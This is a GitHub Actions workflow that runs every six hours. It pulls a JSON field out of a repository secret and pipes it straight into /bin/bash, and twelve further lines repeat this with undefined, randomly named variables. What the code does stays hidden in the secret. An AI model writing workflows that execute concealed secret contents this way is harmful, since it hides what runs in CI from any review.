name: xiongjiance

on:
  workflow_dispatch:
  schedule:
    - cron: '44 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiongjiance
        env:
          qyct3: ${{ secrets.qyct3 }}
        run: |
          echo $qyct3 | jq -r .hmqh0316 | /bin/bash
          echo $hb1244 | jq -r .u2576 | /bin/bash
          echo $mlpci45377 | jq -r .psgs9764 | /bin/bash
          echo $rm36 | jq -r .zoil0993 | /bin/bash
          echo $e9 | jq -r .zfyou65 | /bin/bash
          echo $y8 | jq -r .qxkq387 | /bin/bash
          echo $fwg5733 | jq -r .dixxv21 | /bin/bash
          echo $m96 | jq -r .ml1 | /bin/bash
          echo $sfqac090 | jq -r .o3 | /bin/bash
          echo $yqob7141 | jq -r .dcj22 | /bin/bash
          echo $tlvqs03 | jq -r .m61 | /bin/bash
          echo $o79299 | jq -r .gosbg81641 | /bin/bash
          echo $fqcn96967 | jq -r .gf7451 | /bin/bash

